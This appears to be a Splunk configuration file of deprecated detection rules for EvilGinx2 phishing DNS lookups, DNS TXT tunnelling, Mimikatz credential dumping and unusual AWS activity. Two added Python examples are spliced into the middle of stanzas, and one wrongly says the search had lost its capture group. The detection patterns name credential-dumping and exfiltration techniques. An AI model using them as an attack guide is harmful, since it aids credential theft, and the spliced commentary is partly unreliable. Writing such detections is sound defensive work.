action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Network_Resolution", "Web"]
action.escu.eli5 = This search looks for DNS requests for phishing domains that are leveraging EvilGinx tools to mimic websites.
action.escu.how_to_implement = You need to ingest data from your DNS logs into the Network_Resolution datamodel. Specifically, you must ingest the domain that is being queried and the IP of the host originating the request. Ideally, you should also be ingesting the answer to the query and the query type. This approach also allows you to create your own localized passive DNS capability, which can aid you in future investigations. You will have to add legitimate domain names to the `legit_domains.csv` file shipped with the app.\
**Splunk>Phantom Playbook Integration**\
If Splunk>Phantom is also configured in your environment, a Playbook called `Lets Encrypt Domain Investigate` can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search, and set the corresponding Playbook to active.\
(Playbook link: `https://my.phantom.us/4.2/playbook/lets-encrypt-domain-investigate/`).
action.escu.known_false_positives = If a known good domain is not listed in the `legit_domains.csv` file, then the search could give you false positives. Please update that lookup file to filter out DNS requests to legitimate domains.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect DNS requests to Phishing Sites leveraging EvilGinx2 - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Common Phishing Frameworks"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect DNS requests to Phishing Sites leveraging EvilGinx2 - Rule
action.correlationsearch.annotations = {"analytic_story": ["Common Phishing Frameworks"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for DNS requests for phishing domains that are leveraging EvilGinx tools to mimic websites.
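The following is an added Python example and is not part of the Splunk content in this file. It runs the registered-domain pattern from this detection's `rex` command (with its `domain` capture group written out, which this page's copy of the search had lost) over constructed DNS query names, applies a constructed stand-in for `legit_domains.csv`, and reports which names the pattern classifies. The query names, source IPs and allowlist rows are invented; the `evilginx_phishlets_*` macros are not modelled.

```python
import re

# Registered-domain extractor from the detection's `rex` command. Python's re
# spells the named group (?P<domain>...) where Splunk's PCRE has (?<domain>...);
# the expression is otherwise the one used by the search, including the
# unescaped "." between the two \S{2,3} groups.
DOMAIN_RE = re.compile(r".*?(?P<domain>[^./:]+\.(\S{2,3}|\S{2,3}.\S{2,3}))$")

# Constructed stand-in for legit_domains.csv: one registered domain per row.
LEGIT_DOMAINS = {"example.com", "example.co.uk"}


def extract_domain(query):
    """Mirror `rex field=query ...`: return the captured domain, or None when the
    pattern does not match. In SPL the field is then simply unset, and the later
    `stats ... by domain` silently drops that event."""
    m = DOMAIN_RE.match(query)
    return m.group("domain") if m else None


def filter_queries(records, legit=LEGIT_DOMAINS):
    """Apply the search's pipeline to DNS records: extract the registered domain,
    group sources and queries by it, and drop domains present in the allowlist.
    Returns ({domain: {"src": set, "query": set}}, [queries the regex missed])."""
    by_domain = {}
    unclassified = []
    for rec in records:
        domain = extract_domain(rec["query"])
        if domain is None:
            unclassified.append(rec["query"])
            continue
        if domain in legit:
            continue
        entry = by_domain.setdefault(domain, {"src": set(), "query": set()})
        entry["src"].add(rec["src"])
        entry["query"].add(rec["query"])
    return by_domain, unclassified


# Constructed Network_Resolution-style records (not real traffic); the lookalike
# names are invented phishlet-style hosts, not known phishing infrastructure.
SAMPLE_DNS = [
    {"src": "10.0.0.5", "query": "login.example.com"},                  # allowlisted
    {"src": "10.0.0.5", "query": "outlook.example.co.uk"},              # allowlisted, two-part TLD
    {"src": "10.0.0.7", "query": "login.microsoftonline-secure.top"},   # 3-character TLD: matched
    {"src": "10.0.0.8", "query": "www.amazon-verify.info"},             # 4-character TLD: not matched
    {"src": "10.0.0.9", "query": "sso.github-auth.cloud"},              # 5-character TLD: matched via the unescaped "."
]


def demo():
    """Run the sample records through the pipeline."""
    hits, missed = filter_queries(SAMPLE_DNS)
    return sorted(hits), missed


if __name__ == "__main__":
    print(demo())
```

Two properties of the pattern are worth knowing before tuning it: a four-character TLD such as `.info` never matches (neither alternative accepts exactly four trailing characters), so those queries never reach the phishlet macros, while five- to seven-character TLDs match only because the `.` between the two `\S{2,3}` groups is unescaped and therefore accepts any character. Escaping that dot would "fix" the regex and lose `.cloud`-style domains, so test with both cases when changing it.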
action.notable.param.rule_title = Detect DNS requests to Phishing Sites leveraging EvilGinx2
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(DNS.answer) as answer from datamodel=Network_Resolution.DNS by DNS.dest DNS.src DNS.query host | `drop_dm_object_name(DNS)` | rex field=query ".*?(?<domain>[^./:]+\.(\S{2,3}|\S{2,3}.\S{2,3}))$" | stats count values(query) as query by domain dest src answer | search `evilginx_phishlets_amazon` OR `evilginx_phishlets_facebook` OR `evilginx_phishlets_github` OR `evilginx_phishlets_0365` OR `evilginx_phishlets_outlook` OR `evilginx_phishlets_aws` OR `evilginx_phishlets_google` | search NOT [| inputlookup legit_domains.csv | fields domain] | join domain type=outer [| tstats count `security_content_summariesonly` values(Web.url) as url from datamodel=Web.Web by Web.dest Web.site | rename "Web.*" as * | rex field=site ".*?(?<domain>[^./:]+\.(\S{2,3}|\S{2,3}.\S{2,3}))$" | table dest domain url] | table count src dest query answer domain url | `detect_dns_requests_to_phishing_sites_leveraging_evilginx2_filter`

[ESCU - Detect Long DNS TXT Record Response - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search is used to detect attempts to use DNS tunneling, by calculating the length of responses to DNS TXT queries. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting unusually large volumes of DNS traffic. Deprecated because this detection should focus on DNS queries instead of DNS responses.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Network_Resolution"]
action.escu.eli5 = This search is used to detect attempts to use DNS tunneling, by calculating the length of responses to DNS TXT queries. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting unusually large volumes of DNS traffic. Deprecated because this detection should focus on DNS queries instead of DNS responses.
action.escu.how_to_implement = To successfully implement this search you need to ingest data from your DNS logs, or monitor DNS traffic using Stream, Bro or something similar. Specifically, this query requires that the DNS data model is populated with information regarding the DNS record type that is being returned as well as the data in the answer section of the protocol.
action.escu.known_false_positives = It's possible that legitimate TXT record responses can be long enough to trigger this search. You can modify the answer-length threshold (`anslen>100`) in this search to help mitigate false positives.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Long DNS TXT Record Response - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious DNS Traffic", "Command And Control"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect Long DNS TXT Record Response - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious DNS Traffic", "Command And Control"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search is used to detect attempts to use DNS tunneling, by calculating the length of responses to DNS TXT queries. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting unusually large volumes of DNS traffic. Deprecated because this detection should focus on DNS queries instead of DNS responses.
action.notable.param.rule_title = Detect Long DNS TXT Record Response
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Resolution where DNS.message_type=response AND DNS.record_type=TXT by DNS.src DNS.dest DNS.answer DNS.record_type | `drop_dm_object_name("DNS")` | eval anslen=len(answer) | search anslen>100 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename src as "Source IP", dest as "Destination IP", answer as "DNS Answer", anslen as "Answer Length", record_type as "DNS Record Type", firstTime as "First Time", lastTime as "Last Time", count as Count | table "Source IP" "Destination IP" "DNS Answer" "DNS Record Type" "Answer Length" Count "First Time" "Last Time" | `detect_long_dns_txt_record_response_filter`

[ESCU - Detect Mimikatz Using Loaded Images - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for processes that load a set of DLLs (images) characteristic of credential dumping with Mimikatz. Deprecated because the libraries Mimikatz loads have changed and Sysmon EventCode 7 (image load) is very noisy.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for processes that load a set of DLLs (images) characteristic of credential dumping with Mimikatz. Deprecated because the libraries Mimikatz loads have changed and Sysmon EventCode 7 (image load) is very noisy.
action.escu.how_to_implement = This search needs Sysmon logs and a Sysmon configuration that includes EventCode 7 (image load) events, including those for powershell.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.
action.escu.known_false_positives = Other tools can load the same DLLs; add those tools to an allowlist, for example through the post-filter macro. False positives may be present with any process that authenticates or uses credentials, PowerShell included. Filter based on parent process.
action.escu.creation_date = 2019-12-03
action.escu.modification_date = 2019-12-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Mimikatz Using Loaded Images - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Credential Dumping", "Detect Zerologon Attack", "Cloud Federated Credential Abuse", "DarkSide Ransomware", "CISA AA22-257A", "CISA AA22-264A", "CISA AA22-320A", "Sandworm Tools"]
action.risk = 1
action.risk.param._risk_message = A process, $Image$, has loaded $ImageLoaded$, which are typically related to credential dumping, on $dest$. Review for further details.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect Mimikatz Using Loaded Images - Rule
action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Detect Zerologon Attack", "Cloud Federated Credential Abuse", "DarkSide Ransomware", "CISA AA22-257A", "CISA AA22-264A", "CISA AA22-320A", "Sandworm Tools"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for processes that load a set of DLLs (images) characteristic of credential dumping with Mimikatz. Deprecated because the libraries Mimikatz loads have changed and Sysmon EventCode 7 (image load) is very noisy.
action.notable.param.rule_title = Detect Mimikatz Using Loaded Images
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=7 | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as ImageLoaded values(ProcessId) as ProcessId by dest, Image | search ImageLoaded=*WinSCard.dll ImageLoaded=*cryptdll.dll ImageLoaded=*hid.dll ImageLoaded=*samlib.dll ImageLoaded=*vaultcli.dll | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mimikatz_using_loaded_images_filter`

[ESCU - Detect Mimikatz Via PowerShell And EventCode 4703 - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for PowerShell requesting privileges consistent with credential dumping. Deprecated because the Windows logging behaviour it relied on has changed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for PowerShell requesting privileges consistent with credential dumping. Deprecated because the Windows logging behaviour it relied on has changed.
action.escu.how_to_implement = You must be ingesting Windows Security logs. You must also enable account change auditing as described here: http://docs.splunk.com/Documentation/Splunk/7.0.2/Data/MonitorWindowseventlogdata. Additionally, this search requires you to enable your Group Management Audit Logs in your Local Windows Security Policy and to be ingesting those logs. More information on how to enable them can be found here: http://whatevernetworks.com/auditing-group-membership-changes-in-active-directory/. Finally, please make sure that the local administrator group name is "Administrators" to be able to look for the right group membership changes.
action.escu.known_false_positives = The activity may be legitimate. PowerShell is often used by administrators to perform various tasks, and it's possible this event could be generated in those cases. In these cases, false positives should be fairly obvious and you may need to tweak the search to eliminate noise.
action.escu.creation_date = 2019-02-27
action.escu.modification_date = 2019-02-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Mimikatz Via PowerShell And EventCode 4703 - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Cloud Federated Credential Abuse"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect Mimikatz Via PowerShell And EventCode 4703 - Rule
action.correlationsearch.annotations = {"analytic_story": ["Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for PowerShell requesting privileges consistent with credential dumping. Deprecated because the Windows logging behaviour it relied on has changed.
action.notable.param.rule_title = Detect Mimikatz Via PowerShell And EventCode 4703
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` signature_id=4703 Process_Name=*powershell.exe | rex field=Message "Enabled Privileges:\s+(?<privs>\w+)\s+Disabled Privileges:" | where privs="SeDebugPrivilege" | stats count min(_time) as firstTime max(_time) as lastTime by dest, Process_Name, privs, Process_ID, Message | rename privs as "Enabled Privilege" | rename Process_Name as process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mimikatz_via_powershell_and_eventcode_4703_filter`

[ESCU - Detect new API calls from user roles - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search detects API calls by `AssumedRole` identities that have not been seen before from that user role, i.e. where the earliest recorded occurrence of the role and API call pair falls within the last 70 minutes.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search detects API calls by `AssumedRole` identities that have not been seen before from that user role, i.e. where the earliest recorded occurrence of the role and API call pair falls within the last 70 minutes.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously seen API call per user roles in AWS CloudTrail" support search once to create a history of previously seen user roles.
action.escu.known_false_positives = It is possible that there are legitimate user roles making new or infrequently used API calls in your infrastructure, causing the search to trigger.
action.escu.creation_date = 2018-04-16
action.escu.modification_date = 2018-04-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect new API calls from user roles - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS User Monitoring"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect new API calls from user roles - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventType=AwsApiCall errorCode=success userIdentity.type=AssumedRole [search `cloudtrail` eventType=AwsApiCall errorCode=success userIdentity.type=AssumedRole | stats earliest(_time) as earliest latest(_time) as latest by userName eventName | inputlookup append=t previously_seen_api_calls_from_user_roles | stats min(earliest) as earliest, max(latest) as latest by userName eventName | outputlookup previously_seen_api_calls_from_user_roles | eval newApiCallfromUserRole=if(earliest>=relative_time(now(), "-70m@m"), 1, 0) | where newApiCallfromUserRole=1 | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | table eventName userName] | rename userName as user | stats values(eventName) earliest(_time) as earliest latest(_time) as latest by user | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | `detect_new_api_calls_from_user_roles_filter`

[ESCU - Detect new user AWS Console Login - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour. Deprecated because this search has been updated to use the Authentication datamodel.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour. Deprecated because this search has been updated to use the Authentication datamodel.
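The following is an added Python example, not Splunk's code, of the previously-seen-lookup idiom shared by the `Detect new API calls from user roles` search above and the `Detect new user AWS Console Login` search in this stanza: merge this run's earliest and latest timestamps into the lookup, write the merged rows back, and flag every key whose merged earliest time is inside the 70-minute dispatch window. The ARNs, timestamps and lookup contents are constructed; for the API-call search the key is the (userName, eventName) pair rather than the ARN, but the merge is the same.

```python
from datetime import datetime, timedelta, timezone

# Both searches run hourly over dispatch.earliest_time = -70m@m and flag a key
# whose merged earliest time is at or after relative_time(now(), "-70m@m").
WINDOW = timedelta(minutes=70)


def merge_first_seen(baseline, observations):
    """Mirror `stats earliest/latest by key | inputlookup append=t <lookup> |
    stats min(earliest) max(latest) by key`, i.e. the rows `outputlookup` writes
    back. baseline maps key -> (earliest, latest); observations are
    (key, timestamp) pairs from this run's events."""
    merged = dict(baseline)
    for key, when in observations:
        if key in merged:
            earliest, latest = merged[key]
            merged[key] = (min(earliest, when), max(latest, when))
        else:
            merged[key] = (when, when)
    return merged


def first_seen(baseline, observations, now, require_observed):
    """Return (flagged keys, merged baseline). A key is flagged when its merged
    earliest time is inside WINDOW. The console-login search evaluates this on
    the merged lookup alone (require_observed=False); the API-call search feeds
    the flagged pairs back into an outer search over this run's raw events, so
    only keys that actually occurred in the window can surface
    (require_observed=True)."""
    merged = merge_first_seen(baseline, observations)
    cutoff = now - WINDOW
    observed = {key for key, _ in observations}
    flagged = sorted(
        key for key, (earliest, _) in merged.items()
        if earliest >= cutoff and (key in observed or not require_observed)
    )
    return flagged, merged


def ts(hour, minute, day=17):
    """Constructed UTC timestamps in April 2024."""
    return datetime(2024, 4, day, hour, minute, tzinfo=timezone.utc)


# Constructed identities and lookup contents (not real accounts).
ALICE = "arn:aws:iam::123456789012:user/alice"
BOB = "arn:aws:iam::123456789012:user/bob"
BASELINE = {ALICE: (ts(9, 0, day=1), ts(18, 0, day=16))}
# Constructed ConsoleLogin events inside the 12:00 run's window (10:50-11:50).
RUN1_EVENTS = [(ALICE, ts(11, 10)), (BOB, ts(11, 20))]


def demo():
    """Two scheduled runs against the constructed lookup."""
    # Run 1 at 12:00: bob has no lookup row, so his earliest time is 11:20 and
    # he is flagged; alice's earliest stays at 1 April and only her latest moves.
    flagged1, baseline1 = first_seen(BASELINE, RUN1_EVENTS, ts(12, 0), require_observed=False)
    # Run 2 at 12:30 (a tighter schedule than the 70-minute window) with no new
    # events: the console-login form flags bob again from the lookup alone,
    # the API-call form does not.
    flagged2_console, _ = first_seen(baseline1, [], ts(12, 30), require_observed=False)
    flagged2_api, _ = first_seen(baseline1, [], ts(12, 30), require_observed=True)
    return {
        "run1": flagged1,
        "alice_after_run1": baseline1[ALICE],
        "bob_after_run1": baseline1[BOB],
        "run2_console": flagged2_console,
        "run2_api": flagged2_api,
    }


if __name__ == "__main__":
    print(demo())
```

The second run is the operational caveat: the console-login search only re-alerts on the same first-seen user if it is scheduled more often than the 70-minute window, which is exactly what the `how_to_implement` text below permits for the baseline refresh. Keep the detection cron at or above the window length, or filter on the run's own events as the API-call search does.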
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. Run the "Previously seen users in AWS CloudTrail" support search only once to create a baseline of previously seen IAM users within the last 30 days. Run "Update previously seen users in AWS CloudTrail" hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines.
action.escu.known_false_positives = When a legitimate new user logs in for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect new user AWS Console Login - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious AWS Login Activities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect new user AWS Console Login - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS Login Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=ConsoleLogin | rename userIdentity.arn as user | stats earliest(_time) as firstTime latest(_time) as lastTime by user | inputlookup append=t previously_seen_users_console_logins_cloudtrail | stats min(firstTime) as firstTime max(lastTime) as lastTime by user | eval userStatus=if(firstTime >= relative_time(now(), "-70m@m"), "First Time Logging into AWS Console", "Previously Seen User") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where userStatus="First Time Logging into AWS Console" | `detect_new_user_aws_console_login_filter`

[ESCU - Detect Spike in AWS API Activity - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search will detect users creating spikes of API activity in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and has been translated to use the latest Change datamodel.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search will detect users creating spikes of API activity in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and has been translated to use the latest Change datamodel.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of baseline data points required before a value can be judged a spike. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike.\
This search produces fields (`eventName`, `numberOfApiCalls`, `uniqueApisCalled`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\
1. **Label:** AWS Event Name, **Field:** eventName\
2. **Label:** Number of API Calls, **Field:** numberOfApiCalls\
3. **Label:** Unique API Calls, **Field:** uniqueApisCalled\
Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`
action.escu.known_false_positives =
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Spike in AWS API Activity - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS User Monitoring"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect Spike in AWS API Activity - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
